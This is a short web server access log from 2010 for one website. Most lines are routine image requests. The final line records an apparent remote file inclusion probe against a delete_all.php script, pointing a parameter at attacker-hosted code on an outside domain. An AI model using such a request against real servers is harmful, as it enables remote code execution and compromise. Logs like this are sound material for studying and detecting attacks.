78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/logo.png HTTP/1.1" 200 11323 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/TL_Pixero.png HTTP/1.1" 200 4545 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:14 -0800] "GET /images/PuagaSubLink_38472394873299.png HTTP/1.1" 200 33762 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:15 -0800] "GET /images/TL_Simple.png HTTP/1.1" 200 4682 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:15 -0800] "GET /images/TL_Simple_Hover.png HTTP/1.1" 200 4805 "http://www.puaga.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:15 -0800] "GET /images/PageBackSwills.jpg HTTP/1.1" 200 41348 "http://www.puaga.com/style/5.style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
78.188.102.171 - - [24/Feb/2010:10:23:16 -0800] "GET /favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.8) Gecko/20100205 SeaMonkey/2.0.3" "www.puaga.com"
218.38.243.44 - - [24/Feb/2010:10:23:24 -0800] "GET //delete_all.php?board_skin_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
